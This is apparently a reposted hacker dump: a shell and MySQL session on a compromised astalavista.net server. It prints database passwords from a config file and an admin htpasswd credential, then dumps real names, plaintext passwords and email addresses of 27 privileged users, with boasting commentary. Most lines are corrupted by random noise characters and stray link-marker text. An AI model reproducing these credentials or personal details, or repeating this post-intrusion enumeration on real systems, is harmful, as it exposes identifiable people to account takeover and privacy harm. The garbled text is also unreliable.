; N3 b" r: }: @drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth) V/ _0 R( W7 ?7 |
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history/ n/ g+ I+ @0 H+ y
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
) Q, Y0 l% t  c+ q-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
& {: B1 a2 u1 A  w4 f; a% e-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc; p; L2 H* i! w  ]( F0 ?  Y
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains9 N3 K+ ~+ F' U9 \8 n
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap+ l: L6 L9 _# \$ m5 w
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
2 Q. c7 q1 c* ]( r6 C  Q& P, Klrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
7 W: I2 T" K9 N8 ~1 C  X7 m% y7 h-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
5 M  }3 F( K, b
. S2 }1 g0 W; I+ gsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
# f6 t- Z  ~' K  K$ Ssh-3.2$ ls -la
; ]( U" i& E7 J' I" W5 {9 ^# atotal 200
2 Q( _' q# g- ]% C  mdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 .
7 Z* m$ O0 z) P0 N  I' q3 }8 kdrwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..6 x- z8 @3 d' f2 C, N: J  o
drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
1 F2 }' T; q3 v. J; mdrwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql- s9 l  T3 j, p. ^! _5 \0 u
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com4 Q- r( i6 d% V! j2 m  x
drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
# i4 V/ P2 W: \' [' {- e  zdrwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner' R7 p1 C# R; ~7 q% a/ Q2 G
-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
5 A  {3 X( ^4 T8 qdrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
/ W0 J5 H0 c$ a1 k5 o5 N- ndrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron: I' `. K8 w3 [6 m
drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
. h5 t* j0 I6 j  v8 v, y6 s3 y/ b% }-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php; X) J# x. u* c  k/ L; w$ P
-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico
& |+ R  G3 I7 M5 D, ?drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
3 K+ o3 d( F2 I) R' O4 Pdrwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour/ E0 R- @, }8 a7 E6 |, I. K- w' N+ e
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
5 y2 U+ s8 |1 P-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess$ X: Y+ ?& r3 |* Y' k% I8 e
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php8 r7 [5 I$ J3 ^/ X+ h7 s- |
-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html
, t' [# c! `; @- @8 B7 u0 ]-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
. @0 m0 W2 D  T-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php
0 x* H- c' c2 l4 B8 l-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf
" I! X$ T4 n) J  }4 j/ s! f2 v0 l+ s$ ^drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc7 r2 m( Z" C  q) |& w" R( I5 e. o! N- b; }
drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
+ E& m: Z/ G: _6 K; t; ]. R2 bdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib9 J6 y" p0 p9 H9 {% K- s( u7 e
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
( }/ J' o9 W$ C' ]5 t( C& F+ Ldrwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
3 Q0 R/ C2 _. I- {  q- ]) q, s: @drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
2 F' o$ q8 i6 E. }# h8 [2 z7 @% gdrwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
, T- I9 E8 m" s, x/ z2 e! `) ?  H-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf* `' [3 o& T. B* z, x2 t
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
& }5 j6 i. P, L2 s0 _-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt! q3 g8 X9 ]8 Y" q" u
drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss: u, L, _$ E" F% _/ Z. e, I
drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources  G2 n: @- ]# r. z( q* r
drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com, ]+ d4 T9 G4 r+ x1 J2 A9 K
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
3 c% r, A/ D# }9 B( ndrwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
: i$ C) ^! G+ k* i4 L6 }- T* G" ]drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
+ `9 _0 [( a5 _8 ^drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v26 \- x( X3 v( {% ^2 t  @! k1 r
drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old/ @2 N) L: F- b3 N, R
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php1 q  h7 R; k  c. H
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki+ s9 v9 P$ p' `0 G

- A  f/ r; K8 z/ r) T! psh-3.2$ head -20 index.php
0 C& t4 W/ L; S- N<?PHP+ L$ ~/ K! G: b- I) Z
/**
0 }% \3 H% K: Q2 z* q% ~+ R* Mainfile (external) for astalavistaNET v2.0  n" Y- B! `" x" O" z2 M- q. p# R
*' F4 e% n, x. n8 \+ X8 v
* @copyright     Astalavista IT Engineering GmbH
+ X6 W6 B- j3 `% s  N% t0 B* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
  g7 Y- w) B5 l; t- Y, Z1 K* @version       1.0
, S8 S; M, w  }1 x2 Q1 z( }* i6 `+ Q*/
0 {) S& o" N  X" d: u! x: ^: {" K! G( [
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
) I& g0 x) w. p) [* ?& @                $dontStartSession = false;+ m1 K0 o. M" y- ?2 ?
        } else {
# T  k9 v1 n' K9 n- C/ \, @                $dontStartSession = true;
2 q5 e# P( Y, s4 P0 O% A' u        }
1 D7 P& U2 Y" n% H0 ?3 {- b7 k( @+ T        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
  [9 e) t* B8 T3 V        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
- y# b4 G  G" j1 O" I7 d3 _        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);) }. Y# A$ z- _" J
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);& ~. S4 b3 a% I* l; g, C

1 Z. }% E/ t1 z$ y4 n! Lsh-3.2$ cd config# V2 N6 X9 Q: t+ Q0 J& s5 i* G
sh-3.2$ ls -la$ I5 s: D" ?. w) x+ k. I4 x
total 32
2 K, ?4 U9 ?( X$ s7 F# X6 _8 Z; Jdrwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
3 Z4 F* p" }2 [/ w9 b: Gdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..$ l; y8 H. ^; P, @3 Y% p+ q2 }
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php* s& w# u# y+ P6 q0 a
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php& x7 O( M  A7 p' s1 ?  m4 ~
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
7 }/ {7 K! U$ A-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php  x! B) L' O. t, ~# a" v
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php; f8 b3 W( e1 w% B' e3 ~
" r3 B7 }" m  R/ q& \
sh-3.2$ cat com.conf.php, ]$ K3 I; C5 i. L- q
[snip]/ p6 F; R, O+ s2 m! U- g
//member-database
4 I9 h/ L) Z7 @2 s$_CONFIG['db_mem_server']       = ‘localhost’;
3 |' G* C, V# o: v+ h2 k$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
' u. p4 d' s  x: Z# u+ b4 D$_CONFIG['db_mem_user']         = ‘astanet_db’;
/ _, A$ O# X" k" r) e8 R0 B$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
! i9 l% `9 X) P; y. c! i$_CONFIG['db_mem_debug']        = false; //true or false+ U( w1 i) C& h6 k
//ads-database
. Q/ S& y6 B$ E: f7 O3 Q, N$_CONFIG['db_ads_server']       = ‘localhost’;) p7 ?! w$ W# G% |% E1 g2 v3 d
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
+ o) ^8 o1 c- Y  v8 S- W0 p$_CONFIG['db_ads_user']         = ‘astanet_db’;
7 x) y" q- S2 O/ F2 y3 \8 R2 A$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
9 \2 u$ S! w# d* k/ v! d+ e$_CONFIG['db_ads_debug']        = false; //true or false- i2 T! r7 y& i2 Z6 x8 h: H
//rainbow-database  S& v1 O& X5 I, M. S8 K& {6 S9 f
$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;) C, D* g+ N: K! l' _3 V) F5 h& I
$_CONFIG['db_rainbow_database'] = ‘rainbow’;7 D& k* U" ^! k$ s: x
$_CONFIG['db_rainbow_user']     = ‘dinu’;+ y; t- q- B& o/ O6 M* ]8 }" N# C
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
2 P' v. S+ V. s. F! F1 A$_CONFIG['db_rainbow_debug']    = false; //true or false& l) K) M* w9 P0 n" L: o+ C
//mailing lists database
/ @. h. g, f: T$ q+ l+ t* }. n$_CONFIG['db_mailing_lists_server']     = ‘localhost’;3 @; X8 o6 w( D$ z, n
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;: B8 V7 K8 L. l5 h/ B/ X
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;7 X& q4 c0 B' n& c! H% K3 ^' m
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;+ C; `, G- R( k- @# X
$_CONFIG['db_mailing_lists_debug']              = false; //true or false
% h) F* f# a( X//paypal. {2 L9 i" [% e
$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
* N  j; u; a( i$ ], S) T( l' {$_CONFIG['sub_pp_cmd']          = ‘_xclick’;9 k- L6 F5 k+ K3 }; R) M" `6 a3 p
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;( v  H. b+ e$ G* X: m: t; U
$_CONFIG['sub_pp_noship']       = ‘1′;, x9 c) |' F7 H+ `9 y4 {7 q+ \, L: d
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;8 Z6 H& o+ E$ z8 \8 X6 c/ y9 R
[snip]- u: I9 p0 n' m( K) x8 ]

5 e: J; |4 H5 C/ r+ xsh-3.2$ cd ..
4 B0 d. E6 Q" L* }: {sh-3.2$ cd member
9 T; P! C2 J. z& j& L+ Ysh-3.2$ ls -la
9 n( D! C0 T5 }. u- {3 i+ B& ^total 20& Z- A. F2 c. `8 n# [& T) I; @
drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .: s, P( G0 ?( B9 Z
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
9 T/ H1 Q  J( Y/ q8 {* d7 Y6 P-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
% q( V2 l/ X9 O+ \; F-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php7 g& |/ {* u* M7 o+ t
sh-3.2$ cat .htaccess
# z/ ~) ^, s8 q  k( }SecFilterEngine off
' |" O, T% m+ g3 v. F2 s+ g! w0 B! P3 j6 {/ z8 m
sh-3.2$ cd ..
* d) e3 b% Y0 R, J% Gsh-3.2$ cd cron
; O5 {$ k9 w" {% Nsh-3.2$ ls -la
' ~! r+ ~1 V- G+ l5 ]9 Xtotal 168
& [5 K' c- [$ N1 Fdrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
$ \8 B5 K. b+ c0 B( C: fdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..; I% a) ^5 o/ M5 P  f6 m$ f. E9 d
-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php! m2 W9 f4 r: S$ T9 c9 q0 s
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php7 V$ m0 L$ ]' ~7 L) v. G
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php) d4 c. a' Z7 d& v* U
-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
! C; T# J, u  t, t/ u-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php, Z; M0 S8 y% N7 Q$ D
-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php
. c9 V; i! s( r6 B2 g. v( [& S' i-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php) Z4 m0 e. D8 {3 Q8 r- K' [
-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
8 {7 l5 }& p$ a  W  u: o-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
. n( k4 T9 c: F! l-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
8 z- ]4 h; F: K* A- @' {-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php5 ~5 ]. D: }2 D/ p
-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php% O4 y! ?, P1 I; Y
-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
- M1 @+ o7 V" }5 X-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php+ Y- g3 x5 B" ~' R, Z8 v5 s
-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php2 A- }& d  F/ [, q2 B: k% L- U
-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php) B# H! s& V- Q& U: A
-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php8 _) v- f9 m" H/ p
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php" C6 N! a7 i' u, R6 q$ ]7 {
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
, q% b8 P' ?' ?# \-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
" F! F& |0 l; W-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
3 l) Q" c$ p/ e& {" }/ U. P( S
4 `$ ?! {2 y% W6 Wsh-3.2$ cd ..
& A; ^1 l& E# S9 J3 a4 Bsh-3.2$ cd _007
- N5 g/ j6 x4 N, m& t( Ush-3.2$ ls -la
8 a2 x6 p$ \3 ~total 24
4 n2 Z% Q% U; D* Hdrwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
: ^. t4 {4 ^! M0 N) u# Odrwxr-x— 29 astanet apache  4096 Jan  6 13:58 .., v9 X. E5 y. a
-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
/ w6 Y9 p  C7 L% e" B& L6 G" }* U-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php
' Q$ j( x7 R* q' p: f2 G-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
5 {% K$ \* d, K& H' ~- ldrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
+ z9 k+ q( t( `" r1 x0 L
4 j" \! A6 ]( hsh-3.2$ cat  .htaccess: ?- b# b" o/ ~9 \
authType Basic
1 Y8 r7 g3 P  }* |% kauthName Admin
) i, W9 u9 I: J3 tauthUserFile /home/astanet/auth/.htadm_pwd
# M8 F% y" L/ D% drequire valid-user: l# I: s% b  o$ W8 a
. z7 @1 W( ?# e/ {+ v4 M
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
7 j: \$ I/ }: G, G0 j3 Sadmin2net:CR0bl65MwhfT. q) l4 `$ k- k3 }2 [' j5 u

% y5 h3 _( M+ |sh-3.2$ mysql -u astanet_db -p" H/ A3 {3 \# V0 y) Q
Enter password:
+ S0 f& l  b' R: F% fWelcome to the MySQL monitor.  Commands end with ; or \g.  G; W$ w" H# q: k& j
Your MySQL connection id is 2751531 e4 O' G2 ~% B3 d8 n7 O
Server version: 5.0.45-community-log MySQL Community Edition (GPL)1 ?& |3 Y7 T, t' k" s% _

; ]3 |9 O5 f6 Q; q" BType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 o* {7 \" m; P  |* Y/ ?* U" ?* ^
& e5 _$ S6 s9 X* Z; Y/ h7 [
mysql> show databases;
! u0 L: b0 C7 F& L4 n! E+———————–+
, m5 L% e* N! M) _| Database              |
+ I( S  o8 H+ H$ V( b, N+———————–+
+ u; g8 Y/ c4 M3 {6 U" K$ ]7 M1 [7 E| information_schema    |
9 p% F6 _8 Z0 J9 p3 c- L/ Z| astanet_ads           |
" R$ e7 v; `6 V0 c| astanet_mailing_lists |
# C6 q# Q6 k8 O2 @3 ~7 a( x/ G) V* O( r; B| astanet_mediawiki     |  R- X( f2 \4 y  S# v6 q
| astanet_membersystem  |! x" f3 A! I* X8 s1 a
| test                  |
: c- p8 E, }% L: }+———————–+
  V/ f5 e# l. F8 m6 rows in set (0.00 sec)
' e4 E; V' B5 Z- N
, b: N+ S# k& d5 _& ^" m' Z6 }$ \mysql> use astanet_membersystem- Y: L$ E8 K9 }4 H! l
Database changed
$ T) f# Y( V6 v8 b8 _* Qmysql> show tables;
8 o$ C/ ~. w4 t' ]3 o$ K+———————————–++ }2 h) M' r  `7 q9 Z$ K  d
| Tables_in_astanet_membersystem    |' N# q* A$ E7 Y: u0 h5 ], `: r
+———————————–+
. l; n- M! @$ H' t( C0 K  E/ v| blacklist_categories              |: V) ~/ J; T9 W+ C) U
| blacklist_content                 |& u$ Q% |7 I/ h& H$ z; P
| blacklist_levels                  |
! u( y' L( C8 T1 X6 h( _| blacklist_mcset                   |
) G/ g1 Z5 K, C/ V( b0 p. u| dir_categories                    |
7 u* l  ~7 Z+ t8 k+ A+ l| dir_comments                      |; _" W$ G/ r. |0 g' {; b
| dir_links                         |/ Z1 v# k7 `1 o( W
| dir_temp                          |" E* v' S# I8 c$ H1 g( v; m# X
| dir_votes                         |1 B6 C" m5 a  S  U7 }; }
| documents                         |7 c0 F7 N) A) L+ v4 k4 T: m1 J
| documents_categories              |
* M7 R+ e- \' z, g2 c/ l| email_content                     |  C* f* @4 G/ p3 W
| email_settings                    |
, L. i. S6 v, I+ y( |6 E| exploits                          |
: k9 Q, z; o1 Z7 Q% n" E. z| exploits_categories               |1 M1 P1 X  b9 Z, K
| exploittree_categories            |
: L( @; D4 O0 C6 S| exploittree_exploits              |  x0 a- O. W9 z
| home_values                       |, u* V, i, }6 {3 y/ Q
| iso_countries                     |
: M% G( g" n$ W/ ?5 r9 Q/ s| links_categories                  |3 r0 X4 g5 c0 z8 Y
| links_records                     |  e. ?( N& K& ^7 ]( F5 H
| links_unauth                      |; z& H' u- p) J; Y! Z6 @
| links_votes                       |
: P  _5 P5 S; u3 r$ @; M# Y( S8 i| log                               |" B4 c' [8 v- j: {, b$ s& K
| news_categories                   |
- ?2 t5 d+ x1 y& || news_comments                     |
) h$ ]0 e! z' R: `| news_emoticons                    |/ W( f% {( o$ s+ O0 q! w
| news_latest                       |1 l9 s, h+ [0 B6 ]8 A" Z
| news_messages                     |5 u  A- t* O5 H4 K, `2 r
| news_statistics                   |5 z, i2 t1 ~6 }3 W% Z5 Z
| news_votes                        |
; W, V- u: e, h1 d3 _| prices_content                    |" H1 V' p. f7 k* f
| prices_offers                     |! |7 s: m4 R# {: O& J/ H
| rss_settings                      |
# }; Z9 s! |' l; u0 A| sessions                          |2 l8 c' u0 [* Q0 @6 s
| stats_signups                     |
# G+ Y) p* W" R' Y| u2u2                              |: x6 e, H) i/ l( i4 Z! U( F
| u2u_contact                       |
! m! a8 s1 [  K% w* x1 M# C% U" k| u2u_settings                      |! ?4 i; o' O7 f; @* L  j* T
| user_keywords_selected_categories |) X2 C8 z- N$ F" w! F" Y
| users                             |
. e2 @5 t. m1 v: \# s9 w/ y| users_ipn_test                    |. E2 w% k$ P+ Y- D9 {
| users_keyword_values              |
% B' P2 \4 E! w; h' [| users_profile                     |
* k* q* d( k5 d2 g5 O2 Z| users_temp                        |' x3 D: i! B: _" V
| users_upgrade                     |/ k7 n. r0 a+ ]6 f1 \8 x
+———————————–+0 J" Q+ [5 M1 e8 s0 q
46 rows in set (0.00 sec)6 m$ u5 O; p' {2 E
' S: G+ T2 S8 W# i% \# [' [
mysql> describe users;
$ v& u) f4 D1 }0 s4 z+————————–+————————————–+——+—–+———————+—————-+
$ l/ o% X! Y# P7 ~  d  \) Y| Field                    | Type                                 | Null | Key | Default             | Extra          |
0 U' n3 H5 V) J7 ]" v$ G- w( W+————————–+————————————–+——+—–+———————+—————-+
% U: W* l3 r3 e- v$ Y3 R1 ]| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
1 n7 j) g3 Q/ q4 C# ?| user                     | varchar(50)                          | NO   |     |                     |                |0 Q- X1 d* d5 `2 R
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
6 T' }: c0 R( b% W* v| password                 | varchar(30)                          | NO   |     |                     |                |' I, M8 C+ s: S# I# @% o. `3 q" ~
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |; F$ ~# C* v+ J
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
" P$ v" P8 c* h  E' D| email                    | varchar(50)                          | NO   |     |                     |                |3 b3 j9 ~0 e$ w
| ip                       | varchar(15)                          | NO   |     | 0                   |                |0 o9 X2 u, {9 m! O! W
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |
5 C" p0 ?3 u5 k" B2 @| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
' s0 T$ B4 P  j4 N* K| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |/ p1 ?: g1 D/ b& B, H
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
* q+ z0 ~) L6 S7 U- k; n& r| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |: ]  \7 Z+ P; b, W+ x2 S
| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |* d5 {) q9 |$ r
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |
/ _( I9 R5 a& _| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |/ l' n9 S- y4 E) b" P
| lang                     | tinytext                             | NO   |     |                     |                |$ s1 `7 M/ B5 {# K: a6 c" H
| adid                     | smallint(6)                          | NO   |     | 0                   |                |6 i4 J8 W" O2 |
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
+ T9 _) `( k2 R7 T6 ~0 n$ Z| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
3 y& P  U9 P6 N! w" H$ P+ }| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |. r7 r" Y+ F. r! F3 ?
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |: l- M& s1 m9 `# b
+————————–+————————————–+——+—–+———————+—————-+" Y% A; _* ?+ Y1 k! A, H# z
22 rows in set (0.01 sec): T7 H1 r, B5 f7 f; o
% y; O5 X  B  ?- c; m
mysql> select count(*) as skids from users;
' f' W. J6 {9 m9 J$ R+——-+; }! n' |2 [( X& _& S, k+ H
| skids |
3 R! D! ~  ~) o9 e6 c9 ^+——-+. O& H, W. _7 e" L
| 25199 |) j" Q( ?7 s& t' G! b' ?- I
+——-+
) }2 k6 w( H: U. Z* r1 row in set (0.00 sec)
: i+ ~: h0 J; U, t, H
$ U$ s2 l, a" @' e* pmysql> select user,nickname,password,email from users where userlevel = 1;
  }+ [# d- h2 ~  Q+————————–+———————-+——————+———————————–+$ M/ n' T' W( K7 V& l* r" J) U# s
| user                     | nickname             | password         | email                             |  m5 T" M" E7 O7 }
+————————–+———————-+——————+———————————–+; [9 A$ [+ x5 l: G" {0 G
| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
4 A5 b, Y5 k7 Z  \5 a/ m( c| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
- p+ W% F. z' r4 d7 P| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
! \0 Q( Z. T7 Q7 d| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |
2 w% l1 m' M! @2 h4 @8 z+ h1 x- N! ~| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |
6 w% R/ H% z& n  B' @| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |# p" C# d' F0 W* w
| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |
& Y+ E! m! f2 n, o& M| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |2 T- y" H0 E) Y, z7 H
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |! n/ o9 D# k) A3 ?6 j
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
0 G) u2 D) b" `- ?9 f) x0 o/ K# G2 N| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |6 ]! Q/ v$ F1 D: R
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |+ b& b7 e6 J+ N9 s9 p/ v* J: y) W% P
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |8 p& V! t( [& i) W3 V0 v) r
| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |8 S" q) R  K1 F8 m6 [
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |2 P7 x0 S- K: v& I( Z" l: c
| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |8 _0 P: v- S. m8 L4 H
| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |
' q: K1 S3 u- r| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |1 ~# ]( w( b6 _% L- M
| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |3 F/ V5 x0 E9 P# H. Z1 Q# F# u
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |
# z  p6 s6 l4 W1 a2 V| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |+ V- I% v. s: |* ^' P
| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |7 p/ u2 k/ B9 V: Y4 Q
| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |) }+ ~, L3 ^* M0 a% A4 k
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |5 H. r* Y  L, K4 s& P( `
| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |1 W; @) Y+ W# F
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |
: @  n; y, ~4 Q" {* _4 N% j| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
, U1 S- U+ e1 C3 ?+————————–+———————-+——————+———————————–+5 B9 ]; h) ]0 a9 V2 B
27 rows in set (0.00 sec)9 }5 e; R$ P( \

1 {3 }% [9 X# @8 ^" y9 |mysql> exit;
2 n" I/ X& S2 PBye
$ g3 V1 R* |% b" u+ \
8 `, r5 z& l4 v/ p" Z" [( |6 q[~] plaintext passwords? yes,
$ O3 I, a' ?/ p6 R- X4 f! H) FThose so called “security professionals” who charge you $6.66 / month to
8 A4 H0 A- [* O! `+ Uregister at their hack-proof portal, save your passwords in plaintext…
8 W' K* Y5 ~) i* |) ^9 Z8 cbrilliant!
0 ?7 {& ~3 s4 G) f: G
% X! Q/ l& x5 M# o; B1 `0 a[~] This been fun but we want more.; B& Z6 a# k, C" c: I

3 d) {. J7 \  B4 y0 M; ssh-3.2$ uname -a; @+ P1 [6 s! {/ a
